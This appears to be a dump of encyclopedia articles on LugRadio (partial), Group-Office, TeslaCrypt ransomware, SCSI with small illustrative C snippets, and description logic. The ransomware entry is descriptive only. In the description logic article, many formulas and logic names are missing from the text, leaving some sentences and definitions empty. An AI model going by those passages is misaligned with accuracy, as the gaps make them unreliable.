2006, LugRadio won the award for Best Marketing Campaign at the UK Linux and Open Source Awards in London and won the award for Best Linux Podcast in the Christmas 2007 edition of Linux Format magazine. LugRadio Live LugRadio Live was an annual event organised by the LugRadio team and held in Wolverhampton. It was a Linux, Free Software and Open Source event intended to be fun, without the corporate agenda held by other commercial events. It was first held in 2005 with 250 attendees, 14 speakers — including Mark Shuttleworth, who arrived by helicopter — and 18 exhibitors including Ubuntu, Debian, KDE and O'Reilly. In 2006 LugRadio Live saw around 400 attendees, over 30 speakers including Michael Meeks and 27 exhibitors including Ubuntu, OpenSolaris, KDE, MythTV, Debian, Fedora and GNOME. LugRadio Live 2007 took place on 7–8 July 2007 at the Light House Media Centre, Wolverhampton attracting hundreds of attendees from around the world. Speakers included Chris DiBona (Google), Gervase Markham (Mozilla) and a representative from the Department for Communities and Local Government. LugRadio Live USA 2008 took place on 12–13 April 2008 at The Metreon in San Francisco. The wide selection of speakers included many celebrities including Miguel de Icaza, Robert Love, Ian Murdock, and Jeremy Allison. The show attracted about five hundred Linux enthusiasts from many countries around the world with several travelling from as far as Europe and Australia. LugRadio Live UK 2008 took place on the weekend of 19 July 2008 in Wolverhampton at the Light House Media Centre. 
LugRadio Live 2009 took place on 24 October 2009 in Wolverhampton at the Newhampton Arts Centre. References External links Technology podcasts 2004 podcast debuts Audio podcasts
8146158
https://en.wikipedia.org/wiki/Group-Office
Group-Office
Group-Office is a PHP-based, dual-licensed commercial/open-source groupware, CRM and DMS product developed by the Dutch company Intermesh. The open-source version, Group-Office Community, is licensed under the AGPL and is available via SourceForge. Group-Office Professional is a commercial product that additionally offers mobile synchronisation, project management and time tracking.

The online suite puts independent office applications onto a central server, making them accessible through a web browser. The suite includes file management, address book, calendar, email, notes and website content management modules. The email client has IMAP and S/MIME support, the calendar supports iCalendar import, and it can be synchronised with personal digital assistants, mobile phones, and Microsoft Outlook. In the Professional version, it is possible to create templates for export to Open Document Format or Microsoft Word. Files can be managed in an inbuilt file manager and accessed through WebDAV. Users may be managed within the application or in an LDAP system. A LAMP environment is recommended on the server, and an OSNews.com review describes the installation process as "straightforward". Linux is recommended as the system software, but it also runs on other Unix systems, including BSD Unix and Mac OS X. From version 2.17 onward, Microsoft Windows is also supported as the system software.

In March 2010, Group-Office was compared to other collaborative software in the German c't magazine, and a special version was included on the bundled DVD. As of November 2012, the project had recorded over 420,000 downloads from SourceForge since its public appearance in March 2003. SourceForge made a blog post about Group-Office in 2010. Group-Office has had a stall and presentations at Linux Wochen 2005 in Vienna and at OSC2005 in Tokyo. The software has been translated into 27 locales, with local communities in Japan and Austria. Version 2.13 of the software was included in the Dutch The Open CD.

In mid-2012, Group-Office 4.0 was released; its PHP framework was completely rewritten using the Model-View-Controller design pattern. Version 4 was reviewed by PC World. The software packages are maintained by a small team at Intermesh and have a small developer community that contributes features. The headquarters are located in 's-Hertogenbosch, The Netherlands.

See also
List of collaborative software
Comparison of time-tracking software

References

External links
Sourceforge.net blog post about Group-Office
Comparison of the Professional and the Community versions
A video about Group-Office by an Italian web TV channel called ICTv

Collaboration Groupware Free content management systems Free software programmed in PHP Web applications Free groupware Free email software Software using the GNU AGPL license
45667045
https://en.wikipedia.org/wiki/TeslaCrypt
TeslaCrypt
TeslaCrypt was a ransomware trojan. It is now defunct, and its master key was released by the developers. In its early forms, TeslaCrypt targeted game-play data for specific computer games; newer variants of the malware also affect other file types.

In its original campaign aimed at game players, upon infection the malware searched for 185 file extensions related to 40 different games, including the Call of Duty series, World of Warcraft, Minecraft and World of Tanks, and encrypted the matching files. The targeted files included save data, player profiles, custom maps and game mods stored on the victim's hard drives. Newer variants of TeslaCrypt were not focused on computer games alone and also encrypted Word, PDF, JPEG and other files. In all cases, the victim would then be prompted to pay a ransom of $500 worth of bitcoins in order to obtain the key to decrypt the files. Although resembling CryptoLocker in form and function, TeslaCrypt shares no code with CryptoLocker and was developed independently. The malware infected computers via the Angler Adobe Flash exploit.

Even though the ransomware claimed that TeslaCrypt used asymmetric encryption, researchers from Cisco's Talos Group found that symmetric encryption was used and developed a decryption tool for it. This "deficiency" was changed in version 2.0, rendering it impossible to decrypt files affected by TeslaCrypt 2.0. By November 2015, security researchers from Kaspersky had been quietly circulating word of a new weakness in version 2.0, while carefully keeping that knowledge away from the malware developers so that they could not fix the flaw. In January 2016, a new version 3.0 was discovered that had fixed the flaw. A full behavior report, which shows BehaviorGraphs and ExecutionGraphs, was published by JoeSecurity.

Shut down
In May 2016, the developers of TeslaCrypt shut down the ransomware and released the master decryption key, bringing it to an end. A few days later, ESET released a public tool to decrypt affected computers at no charge.

References

Blackmail Windows malware Cryptographic attacks 2015 in computing Ransomware
28313
https://en.wikipedia.org/wiki/SCSI
SCSI
Small Computer System Interface (SCSI, ) is a set of standards for physically connecting and transferring data between computers and peripheral devices. The SCSI standards define commands, protocols, electrical, optical and logical interfaces. The SCSI standard defines command sets for specific peripheral device types; the presence of "unknown" as one of these types means that in theory it can be used as an interface to almost any device, but the standard is highly pragmatic and addressed toward commercial requirements. The initial Parallel SCSI was most commonly used for hard disk drives and tape drives, but it can connect a wide range of other devices, including scanners and CD drives, although not all controllers can handle all devices. The ancestral SCSI standard, X3.131-1986, generally referred to as SCSI-1, was published by the X3T9 technical committee of the American National Standards Institute (ANSI) in 1986. SCSI-2 was published in August 1990 as X3.T9.2/86-109, with further revisions in 1994 and subsequent adoption of a multitude of interfaces. Further refinements have resulted in improvements in performance and support for ever-increasing storage data capacity. History Parallel interface SCSI is derived from "SASI", the "Shugart Associates System Interface", developed beginning 1979 and publicly disclosed in 1981. Larry Boucher is considered to be the "father" of SASI and ultimately SCSI due to his pioneering work first at Shugart Associates and then at Adaptec. A SASI controller provided a bridge between a hard disk drive's low-level interface and a host computer, which needed to read blocks of data. SASI controller boards were typically the size of a hard disk drive and were usually physically mounted to the drive's chassis. SASI, which was used in mini- and early microcomputers, defined the interface as using a 50-pin flat ribbon connector which was adopted as the SCSI-1 connector. SASI is a fully compliant subset of SCSI-1 so that many, if not all, of the then-existing SASI controllers were SCSI-1 compatible. Until at least February 1982, ANSI developed the specification as "SASI" and "Shugart Associates System Interface" however, the committee documenting the standard would not allow it to be named after a company. Almost a full day was devoted to agreeing to name the standard "Small Computer System Interface", which Boucher intended to be pronounced "sexy", but ENDL's Dal Allan pronounced the new acronym as "scuzzy" and that stuck. A number of companies such as NCR Corporation, Adaptec and Optimem were early supporters of SCSI. The NCR facility in Wichita, Kansas is widely thought to have developed the industry's first SCSI controller chip; it worked the first time. The "small" reference in "small computer system interface" is historical; since the mid-1990s, SCSI has been available on even the largest of computer systems. Since its standardization in 1986, SCSI has been commonly used in the Amiga, Atari, Apple Macintosh and Sun Microsystems computer lines and PC server systems. Apple started using the less-expensive parallel ATA (PATA, also known as IDE) for its low-end machines with the Macintosh Quadra 630 in 1994, and added it to its high-end desktops starting with the Power Macintosh G3 in 1997. Apple dropped on-board SCSI completely in favor of IDE and FireWire with the (Blue & White) Power Mac G3 in 1999, while still offering a PCI SCSI host adapter as an option on up to the Power Macintosh G4 (AGP Graphics) models. 
Sun switched its lower-end range to Serial ATA (SATA). Commodore included SCSI on the Amiga 3000/3000T systems, and it was an add-on to the earlier Amiga 500/2000 models. Starting with the Amiga 600/1200/4000 systems, Commodore switched to the IDE interface. Atari included SCSI as standard in its Atari MEGA STE, Atari TT and Atari Falcon computer models. SCSI has never been popular in the low-priced IBM PC world, owing to the lower cost and adequate performance of the ATA hard disk standard. However, SCSI drives and even SCSI RAIDs became common in PC workstations for video or audio production.

Modern SCSI
Recent physical versions of SCSI, namely Serial Attached SCSI (SAS), SCSI-over-Fibre Channel Protocol (FCP), and USB Attached SCSI (UAS), break from the traditional parallel SCSI bus and perform data transfer via serial communications using point-to-point links. Although much of the SCSI documentation talks about the parallel interface, all modern development efforts use serial interfaces. Serial interfaces have a number of advantages over parallel SCSI, including higher data rates, simplified cabling, longer reach, improved fault isolation and full-duplex capability. The primary reason for the shift to serial interfaces is the clock skew issue of high-speed parallel interfaces, which makes the faster variants of parallel SCSI susceptible to problems caused by cabling and termination.

The non-physical iSCSI preserves the basic SCSI paradigm, especially the command set, almost unchanged, by embedding SCSI-3 over TCP/IP. iSCSI therefore uses logical connections instead of physical links and can run on top of any network supporting IP. The actual physical links are realized on lower network layers, independently from iSCSI. Predominantly, Ethernet is used, which is also serial in nature.

SCSI is popular on high-performance workstations, servers, and storage appliances. Almost all RAID subsystems on servers have used some kind of SCSI hard disk drives for decades (initially parallel SCSI, then Fibre Channel, and more recently SAS), though a number of manufacturers offer SATA-based RAID subsystems as a cheaper option. Moreover, SAS offers compatibility with SATA devices, which, together with the existence of nearline SAS (NL-SAS) drives, creates a much broader range of options for RAID subsystems. Instead of SCSI, modern desktop computers and notebooks typically use SATA interfaces for internal hard disk drives, with NVMe over PCIe gaining popularity as SATA can bottleneck modern solid-state drives.

Interfaces
SCSI is available in a variety of interfaces. The first was parallel SCSI (also called the SCSI Parallel Interface or SPI), which uses a parallel bus design. Beginning in 2005, SPI was gradually replaced by Serial Attached SCSI (SAS), which uses a serial design but retains other aspects of the technology. Many other interfaces which do not rely on complete SCSI standards still implement the SCSI command protocol; others drop the physical implementation entirely while retaining the SCSI architectural model. iSCSI, for example, uses TCP/IP as a transport mechanism, which is most often carried over Gigabit Ethernet or faster network links. SCSI interfaces have often been included on computers from various manufacturers for use under Microsoft Windows, classic Mac OS, Unix, Commodore Amiga and Linux operating systems, either implemented on the motherboard or by means of plug-in adaptors. With the advent of SAS and SATA drives, provision for parallel SCSI on motherboards was discontinued.
Parallel SCSI Initially, the SCSI Parallel Interface (SPI) was the only interface using the SCSI protocol. Its standardization started as a single-ended 8-bit bus in 1986, transferring up to 5 MB/s, and evolved into a low-voltage differential 16-bit bus capable of up to 320 MB/s. The last SPI-5 standard from 2003 also defined a 640 MB/s speed which failed to be realized. Parallel SCSI specifications include several synchronous transfer modes for the parallel cable, and an asynchronous mode. The asynchronous mode is a classic request/acknowledge protocol, which allows systems with a slow bus or simple systems to also use SCSI devices. Faster synchronous modes are used more frequently. SCSI interfaces Cabling SCSI Parallel Interface Internal parallel SCSI cables are usually ribbons, with two or more 50–, 68–, or 80–pin connectors attached. External cables are typically shielded (but may not be), with 50– or 68–pin connectors at each end, depending upon the specific SCSI bus width supported. The 80–pin Single Connector Attachment (SCA) is typically used for hot-pluggable devices Fibre Channel Fibre Channel can be used to transport SCSI information units, as defined by the Fibre Channel Protocol for SCSI (FCP). These connections are hot-pluggable and are usually implemented with optical fiber. Serial attached SCSI Serial attached SCSI (SAS) uses a modified Serial ATA data and power cable. iSCSI iSCSI (Internet Small Computer System Interface) usually uses Ethernet connectors and cables as its physical transport, but can run over any physical transport capable of transporting IP. SRP The SCSI RDMA Protocol (SRP) is a protocol that specifies how to transport SCSI commands over a reliable RDMA connection. This protocol can run over any RDMA-capable physical transport, e.g. InfiniBand or Ethernet when using RoCE or iWARP. USB Attached SCSI USB Attached SCSI allows SCSI devices to use the Universal Serial Bus. Automation/Drive Interface The Automation/Drive Interface − Transport Protocol (ADT) is used to connect removable media devices, such as tape drives, with the controllers of the libraries (automation devices) in which they are installed. The ADI standard specifies the use of RS-422 for the physical connections. The second-generation ADT-2 standard defines iADT, use of the ADT protocol over IP (Internet Protocol) connections, such as over Ethernet. The Automation/Drive Interface − Commands standards (ADC, ADC-2, and ADC-3) define SCSI commands for these installations. SCSI command protocol In addition to many different hardware implementations, the SCSI standards also include an extensive set of command definitions. The SCSI command architecture was originally defined for parallel SCSI buses but has been carried forward with minimal change for use with iSCSI and serial SCSI. Other technologies which use the SCSI command set include the ATA Packet Interface, USB Mass Storage class and FireWire SBP-2. In SCSI terminology, communication takes place between an initiator and a target. The initiator sends a command to the target, which then responds. SCSI commands are sent in a Command Descriptor Block (CDB). The CDB consists of a one byte operation code followed by five or more bytes containing command-specific parameters. At the end of the command sequence, the target returns a status code byte, such as 00h for success, 02h for an error (called a Check Condition), or 08h for busy. 
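To make the CDB layout and status codes just described more concrete, the following short C sketch builds a standard six-byte INQUIRY CDB and interprets the status byte returned by a target. It illustrates only the byte layout defined by the command set; how the CDB is actually delivered to a device is transport- and operating-system-specific (for example via a host adapter driver or, on Linux, the SG_IO pass-through interface) and is not shown here.

#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Status byte values defined by the SCSI architecture model. */
#define SCSI_STATUS_GOOD            0x00
#define SCSI_STATUS_CHECK_CONDITION 0x02
#define SCSI_STATUS_BUSY            0x08

/* Build a six-byte INQUIRY CDB: a one-byte operation code (12h)
   followed by command-specific parameters and a control byte. */
static void build_inquiry_cdb(uint8_t cdb[6], uint16_t alloc_len)
{
    memset(cdb, 0, 6);
    cdb[0] = 0x12;                        /* INQUIRY operation code      */
    cdb[1] = 0x00;                        /* EVPD = 0: standard inquiry  */
    cdb[2] = 0x00;                        /* page code (unused here)     */
    cdb[3] = (uint8_t)(alloc_len >> 8);   /* allocation length, MSB      */
    cdb[4] = (uint8_t)(alloc_len & 0xFF); /* allocation length, LSB      */
    cdb[5] = 0x00;                        /* control byte                */
}

int main(void)
{
    uint8_t cdb[6];
    build_inquiry_cdb(cdb, 96);

    for (int i = 0; i < 6; i++)           /* print the CDB bytes */
        printf("%02X ", cdb[i]);
    printf("\n");

    /* Interpret the status byte that the target would return. */
    uint8_t status = SCSI_STATUS_GOOD;    /* placeholder value */
    if (status == SCSI_STATUS_CHECK_CONDITION)
        puts("Check Condition: issue REQUEST SENSE for details");
    else if (status == SCSI_STATUS_BUSY)
        puts("Target busy: retry later");
    else
        puts("Command completed successfully");
    return 0;
}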
When the target returns a Check Condition in response to a command, the initiator usually then issues a SCSI Request Sense command in order to obtain a key code qualifier (KCQ) from the target. The Check Condition and Request Sense sequence involves a special SCSI protocol called a Contingent Allegiance Condition. There are four categories of SCSI commands: N (non-data), W (writing data from initiator to target), R (reading data), and B (bidirectional). There are about 60 different SCSI commands in total, with the most commonly used being: Test unit ready: Queries device to see if it is ready for data transfers (disk spun up, media loaded, etc.). Inquiry: Returns basic device information. Request sense: Returns any error codes from the previous command that returned an error status. Send diagnostic and Receive diagnostic results: runs a simple self-test, or a specialised test defined in a diagnostic page. Start/Stop unit: Spins disks up and down, or loads/unloads media (CD, tape, etc.). Read capacity: Returns storage capacity. Format unit: Prepares a storage medium for use. In a disk, a low level format will occur. Some tape drives will erase the tape in response to this command. Read: (four variants): Reads data from a device. Write: (four variants): Writes data to a device. Log sense: Returns current information from log pages. Mode sense: Returns current device parameters from mode pages. Mode select: Sets device parameters in a mode page. Each device on the SCSI bus is assigned a unique SCSI identification number or ID. Devices may encompass multiple logical units, which are addressed by logical unit number (LUN). Simple devices have just one LUN, more complex devices may have multiple LUNs. A "direct access" (i.e. disk type) storage device consists of a number of logical blocks, addressed by Logical Block Address (LBA). A typical LBA equates to 512 bytes of storage. The usage of LBAs has evolved over time and so four different command variants are provided for reading and writing data. The Read(6) and Write(6) commands contain a 21-bit LBA address. The Read(10), Read(12), Read Long, Write(10), Write(12), and Write Long commands all contain a 32-bit LBA address plus various other parameter options. The capacity of a "sequential access" (i.e. tape-type) device is not specified because it depends, amongst other things, on the length of the tape, which is not identified in a machine-readable way. Read and write operations on a sequential access device begin at the current tape position, not at a specific LBA. The block size on sequential access devices can either be fixed or variable, depending on the specific device. Tape devices such as half-inch 9-track tape, DDS (4 mm tapes physically similar to DAT), Exabyte, etc., support variable block sizes. Device identification Parallel interface On a parallel SCSI bus, a device (e.g. host adapter, disk drive) is identified by a "SCSI ID", which is a number in the range 0–7 on a narrow bus and in the range 0–15 on a wide bus. On earlier models a physical jumper or switch controls the SCSI ID of the initiator (host adapter). On modern host adapters (since about 1997), doing I/O to the adapter sets the SCSI ID; for example, the adapter often contains a Option ROM (SCSI BIOS) program that runs when the computer boots up and that program has menus that let the operator choose the SCSI ID of the host adapter. Alternatively, the host adapter may come with software that must be installed on the host computer to configure the SCSI ID. 
The traditional SCSI ID for a host adapter is 7, as that ID has the highest priority during bus arbitration (even on a 16 bit bus). The SCSI ID of a device in a drive enclosure that has a back plane is set either by jumpers or by the slot in the enclosure the device is installed into, depending on the model of the enclosure. In the latter case, each slot on the enclosure's back plane delivers control signals to the drive to select a unique SCSI ID. A SCSI enclosure without a back plane often has a switch for each drive to choose the drive's SCSI ID. The enclosure is packaged with connectors that must be plugged into the drive where the jumpers are typically located; the switch emulates the necessary jumpers. While there is no standard that makes this work, drive designers typically set up their jumper headers in a consistent format that matches the way that these switches implement. Setting the bootable (or first) hard disk to SCSI ID 0 is an accepted IT community recommendation. SCSI ID 2 is usually set aside for the floppy disk drive while SCSI ID 3 is typically for a CD-ROM drive. General Note that a SCSI target device (which can be called a "physical unit") is sometimes divided into smaller "logical units". For example, a high-end disk subsystem may be a single SCSI device but contain dozens of individual disk drives, each of which is a logical unit. Further, a RAID array may be a single SCSI device, but may contain many logical units, each of which is a "virtual" disk—a stripe set or mirror set constructed from portions of real disk drives. The SCSI ID, WWN, etc. in this case identifies the whole subsystem, and a second number, the logical unit number (LUN) identifies a disk device (real or virtual) within the subsystem. It is quite common, though incorrect, to refer to the logical unit itself as a "LUN". Accordingly, the actual LUN may be called a "LUN number" or "LUN id". In modern SCSI transport protocols, there is an automated process for the "discovery" of the IDs. The SSA initiator (normally the host computer through the 'host adaptor') "walk the loop" to determine what devices are connected and then assigns each one a 7-bit "hop-count" value. Fibre Channel – Arbitrated Loop (FC-AL) initiators use the LIP (Loop Initialization Protocol) to interrogate each device port for its WWN (World Wide Name). For iSCSI, because of the unlimited scope of the (IP) network, the process is quite complicated. These discovery processes occur at power-on/initialization time and also if the bus topology changes later, for example if an extra device is added. SCSI has the CTL (Channel, Target or Physical Unit Number, Logical Unit Number) identification mechanism per host bus adapter, or the HCTL (HBA, Channel, PUN, LUN) identification mechanism, one host adapter may have more than one channels. Device Type While all SCSI controllers can work with read/write storage devices, i.e. disk and tape, some will not work with some other device types; older controllers are likely to be more limited, sometimes by their driver software, and more Device Types were added as SCSI evolved. Even CD-ROMs are not handled by all controllers. Device Type is a 5-bit field reported by a SCSI Inquiry Command; defined SCSI Peripheral Device Types include, in addition to many varieties of storage device, printer, scanner, communications device, and a catch-all "processor" type for devices not otherwise listed. 
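As a small illustration of the Device Type field just mentioned, the sketch below decodes the peripheral device type from the first byte of standard INQUIRY response data, where bits 4-0 carry the device type and bits 7-5 the peripheral qualifier. Only a handful of the defined type codes are mapped here; the full list is in the SPC standard, and the sample byte value is of course hypothetical.

#include <stdint.h>
#include <stdio.h>

/* Map a few SCSI peripheral device type codes (INQUIRY data byte 0,
   bits 4..0) to human-readable names. */
static const char *peripheral_type_name(uint8_t type)
{
    switch (type) {
    case 0x00: return "direct-access device (disk)";
    case 0x01: return "sequential-access device (tape)";
    case 0x02: return "printer";
    case 0x03: return "processor device";
    case 0x05: return "CD/DVD device";
    case 0x06: return "scanner";
    case 0x09: return "communications device";
    case 0x0D: return "enclosure services device";
    default:   return "other/unknown device type";
    }
}

int main(void)
{
    /* First byte of a hypothetical INQUIRY response: qualifier 0,
       device type 0x00 (direct-access block device). */
    uint8_t inquiry_byte0 = 0x00;

    uint8_t qualifier = (inquiry_byte0 >> 5) & 0x07; /* bits 7..5 */
    uint8_t dev_type  = inquiry_byte0 & 0x1F;        /* bits 4..0 */

    printf("peripheral qualifier: %u\n", qualifier);
    printf("peripheral device type: 0x%02X (%s)\n",
           dev_type, peripheral_type_name(dev_type));
    return 0;
}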
SCSI enclosure services In larger SCSI servers, the disk-drive devices are housed in an intelligent enclosure that supports SCSI Enclosure Services (SES). The initiator can communicate with the enclosure using a specialized set of SCSI commands to access power, cooling, and other non-data characteristics. See also Fibre Channel List of device bandwidths Parallel SCSI Serial Attached SCSI Notes References Bibliography External links InterNational Committee for Information Technology Standards: T10 Technical Committee on SCSI Storage Interfaces (SCSI standards committee) Macintosh internals Logical communication interfaces Electrical communication interfaces Computer storage buses
183503
https://en.wikipedia.org/wiki/Description%20logic
Description logic
Description logics (DL) are a family of formal knowledge representation languages. Many DLs are more expressive than propositional logic but less expressive than first-order logic. In contrast to the latter, the core reasoning problems for DLs are (usually) decidable, and efficient decision procedures have been designed and implemented for these problems. There are general, spatial, temporal, spatiotemporal, and fuzzy description logics, and each description logic features a different balance between expressive power and reasoning complexity by supporting different sets of mathematical constructors. DLs are used in artificial intelligence to describe and reason about the relevant concepts of an application domain (known as terminological knowledge). It is of particular importance in providing a logical formalism for ontologies and the Semantic Web: the Web Ontology Language (OWL) and its profiles are based on DLs. The most notable application of DLs and OWL is in biomedical informatics where DL assists in the codification of biomedical knowledge. Introduction A description logic (DL) models concepts, roles and individuals, and their relationships. The fundamental modeling concept of a DL is the axiom—a logical statement relating roles and/or concepts. This is a key difference from the frames paradigm where a frame specification declares and completely defines a class. Nomenclature Terminology compared to FOL and OWL The description logic community uses different terminology than the first-order logic (FOL) community for operationally equivalent notions; some examples are given below. The Web Ontology Language (OWL) uses again a different terminology, also given in the table below. Naming convention There are many varieties of description logics and there is an informal naming convention, roughly describing the operators allowed. The expressivity is encoded in the label for a logic starting with one of the following basic logics: Followed by any of the following extensions: Exceptions Some canonical DLs that do not exactly fit this convention are: Examples As an example, is a centrally important description logic from which comparisons with other varieties can be made. is simply with complement of any concept allowed, not just atomic concepts. is used instead of the equivalent . A further example, the description logic is the logic plus extended cardinality restrictions, and transitive and inverse roles. The naming conventions aren't purely systematic so that the logic might be referred to as and other abbreviations are also made where possible. The Protégé ontology editor supports . Three major biomedical informatics terminology bases, SNOMED CT, GALEN, and GO, are expressible in (with additional role properties). OWL 2 provides the expressiveness of , OWL-DL is based on , and for OWL-Lite it is . History Description logic was given its current name in the 1980s. Previous to this it was called (chronologically): terminological systems, and concept languages. Knowledge representation Frames and semantic networks lack formal (logic-based) semantics. DL was first introduced into knowledge representation (KR) systems to overcome this deficiency. The first DL-based KR system was KL-ONE (by Ronald J. Brachman and Schmolze, 1985). During the '80s other DL-based systems using structural subsumption algorithms were developed including KRYPTON (1983), LOOM (1987), BACK (1988), K-REP (1991) and CLASSIC (1991). 
This approach featured DL with limited expressiveness but relatively efficient (polynomial time) reasoning. In the early '90s, the introduction of a new tableau based algorithm paradigm allowed efficient reasoning on more expressive DL. DL-based systems using these algorithms — such as KRIS (1991) — show acceptable reasoning performance on typical inference problems even though the worst case complexity is no longer polynomial. From the mid '90s, reasoners were created with good practical performance on very expressive DL with high worst case complexity. Examples from this period include FaCT, RACER (2001), CEL (2005), and KAON 2 (2005). DL reasoners, such as FaCT, FaCT++, RACER, DLP and Pellet, implement the method of analytic tableaux. KAON2 is implemented by algorithms which reduce a SHIQ(D) knowledge base to a disjunctive datalog program. Semantic web The DARPA Agent Markup Language (DAML) and Ontology Inference Layer (OIL) ontology languages for the Semantic Web can be viewed as syntactic variants of DL. In particular, the formal semantics and reasoning in OIL use the DL. The DAML+OIL DL was developed as a submission to—and formed the starting point of—the World Wide Web Consortium (W3C) Web Ontology Working Group. In 2004, the Web Ontology Working Group completed its work by issuing the OWL recommendation. The design of OWL is based on the family of DL with OWL DL and OWL Lite based on and respectively. The W3C OWL Working Group began work in 2007 on a refinement of - and extension to - OWL. In 2009, this was completed by the issuance of the OWL2 recommendation. OWL2 is based on the description logic . Practical experience demonstrated that OWL DL lacked several key features necessary to model complex domains. Modeling In DL, a distinction is drawn between the so-called TBox (terminological box) and the ABox (assertional box). In general, the TBox contains sentences describing concept hierarchies (i.e., relations between concepts) while the ABox contains ground sentences stating where in the hierarchy, individuals belong (i.e., relations between individuals and concepts). For example, the statement: belongs in the TBox, while the statement: belongs in the ABox. Note that the TBox/ABox distinction is not significant, in the same sense that the two "kinds" of sentences are not treated differently in first-order logic (which subsumes most DL). When translated into first-order logic, a subsumption axiom like () is simply a conditional restriction to unary predicates (concepts) with only variables appearing in it. Clearly, a sentence of this form is not privileged or special over sentences in which only constants ("grounded" values) appear like (). So why was the distinction introduced? The primary reason is that the separation can be useful when describing and formulating decision-procedures for various DL. For example, a reasoner might process the TBox and ABox separately, in part because certain key inference problems are tied to one but not the other one ('classification' is related to the TBox, 'instance checking' to the ABox). Another example is that the complexity of the TBox can greatly affect the performance of a given decision-procedure for a certain DL, independently of the ABox. Thus, it is useful to have a way to talk about that specific part of the knowledge base. The secondary reason is that the distinction can make sense from the knowledge base modeler's perspective. 
It is plausible to distinguish between our conception of terms/concepts in the world (class axioms in the TBox) and particular manifestations of those terms/concepts (instance assertions in the ABox). In the above example: when the hierarchy within a company is the same in every branch but the assignment to employees is different in every department (because there are other people working there), it makes sense to reuse the TBox for different branches that do not use the same ABox. There are two features of description logic that are not shared by most other data description formalisms: DL does not make the unique name assumption (UNA) or the closed-world assumption (CWA). Not having UNA means that two concepts with different names may be allowed by some inference to be shown to be equivalent. Not having CWA, or rather having the open world assumption (OWA) means that lack of knowledge of a fact does not immediately imply knowledge of the negation of a fact. Formal description Like first-order logic (FOL), a syntax defines which collections of symbols are legal expressions in a description logic, and semantics determine meaning. Unlike FOL, a DL may have several well known syntactic variants. Syntax The syntax of a member of the description logic family is characterized by its recursive definition, in which the constructors that can be used to form concept terms are stated. Some constructors are related to logical constructors in first-order logic (FOL) such as intersection or conjunction of concepts, union or disjunction of concepts, negation or complement of concepts, universal restriction and existential restriction. Other constructors have no corresponding construction in FOL including restrictions on roles for example, inverse, transitivity and functionality. Notation Let C and D be concepts, a and b be individuals, and R be a role. If a is R-related to b, then b is called an R-successor of a. The description logic ALC The prototypical DL Attributive Concept Language with Complements () was introduced by Manfred Schmidt-Schauß and Gert Smolka in 1991, and is the basis of many more expressive DLs. The following definitions follow the treatment in Baader et al. Let , and be (respectively) sets of concept names (also known as atomic concepts), role names and individual names (also known as individuals, nominals or objects). Then the ordered triple (, , ) is the signature. Concepts The set of concepts is the smallest set such that: The following are concepts: (top is a concept) (bottom is a concept) Every (all atomic concepts are concepts) If and are concepts and then the following are concepts: (the intersection of two concepts is a concept) (the union of two concepts is a concept) (the complement of a concept is a concept) (the universal restriction of a concept by a role is a concept) (the existential restriction of a concept by a role is a concept) Terminological axioms A general concept inclusion (GCI) has the form where and are concepts. Write when and . A TBox is any finite set of GCIs. Assertional axioms A concept assertion is a statement of the form where and C is a concept. A role assertion is a statement of the form where and R is a role. An ABox is a finite set of assertional axioms. Knowledge base A knowledge base (KB) is an ordered pair for TBox and ABox . Semantics The semantics of description logics are defined by interpreting concepts as sets of individuals and roles as sets of ordered pairs of individuals. Those individuals are typically assumed from a given domain. 
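To make the syntax just defined concrete before turning to the formal semantics, here is a small worked example of an ALC knowledge base, written in the standard notation of Baader et al.; the concept, role and individual names are invented purely for illustration.

% TBox (terminological axioms, i.e. GCIs):
\mathit{Woman} \sqsubseteq \mathit{Person}
\mathit{Mother} \equiv \mathit{Woman} \sqcap \exists \mathit{hasChild}.\mathit{Person}

% ABox (assertional axioms about individuals):
\mathit{Woman}(\mathit{mary}) \qquad \mathit{Person}(\mathit{john}) \qquad \mathit{hasChild}(\mathit{mary},\mathit{john})

% For the knowledge base K consisting of this TBox and ABox it follows that
\mathcal{K} \models \mathit{Mother}(\mathit{mary}) \qquad \text{and} \qquad \mathcal{K} \models \mathit{Person}(\mathit{mary})

Verifying the first of these consequences is an example of instance checking, one of the standard inference problems discussed later in this article.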
The semantics of non-atomic concepts and roles is then defined in terms of atomic concepts and roles. This is done by using a recursive definition similar to the syntax. The description logic ALC The following definitions follow the treatment in Baader et al. A terminological interpretation over a signature consists of a non-empty set called the domain a interpretation function that maps: every individual to an element every concept to a subset of every role name to a subset of such that (union means disjunction) (intersection means conjunction) (complement means negation) Define (read in I holds) as follows TBox if and only if if and only if for every ABox if and only if if and only if if and only if for every Knowledge base Let be a knowledge base. if and only if and Inference Decision problems In addition to the ability to describe concepts formally, one also would like to employ the description of a set of concepts to ask questions about the concepts and instances described. The most common decision problems are basic database-query-like questions like instance checking (is a particular instance (member of an ABox) a member of a given concept) and relation checking (does a relation/role hold between two instances, in other words does a have property b), and the more global-database-questions like subsumption (is a concept a subset of another concept), and concept consistency (is there no contradiction among the definitions or chain of definitions). The more operators one includes in a logic and the more complicated the TBox (having cycles, allowing non-atomic concepts to include each other), usually the higher the computational complexity is for each of these problems (see Description Logic Complexity Navigator for examples). Relationship with other logics First-order logic Many DLs are decidable fragments of first-order logic (FOL) and are usually fragments of two-variable logic or guarded logic. In addition, some DLs have features that are not covered in FOL; this includes concrete domains (such as integer or strings, which can be used as ranges for roles such as hasAge or hasName) or an operator on roles for the transitive closure of that role. Fuzzy description logic Fuzzy description logics combines fuzzy logic with DLs. Since many concepts that are needed for intelligent systems lack well defined boundaries, or precisely defined criteria of membership, fuzzy logic is needed to deal with notions of vagueness and imprecision. This offers a motivation for a generalization of description logic towards dealing with imprecise and vague concepts. Modal logic Description logic is related to—but developed independently of—modal logic (ML). Many—but not all—DLs are syntactic variants of ML. In general, an object corresponds to a possible world, a concept corresponds to a modal proposition, and a role-bounded quantifier to a modal operator with that role as its accessibility relation. Operations on roles (such as composition, inversion, etc.) correspond to the modal operations used in dynamic logic. Examples Temporal description logic Temporal description logic represents—and allows reasoning about—time dependent concepts and many different approaches to this problem exist. For example, a description logic might be combined with a modal temporal logic such as linear temporal logic. See also Formal concept analysis Lattice (order) Semantic parameterization Semantic reasoner References Further reading F. Baader, D. Calvanese, D. L. McGuinness, D. Nardi, P. F. 
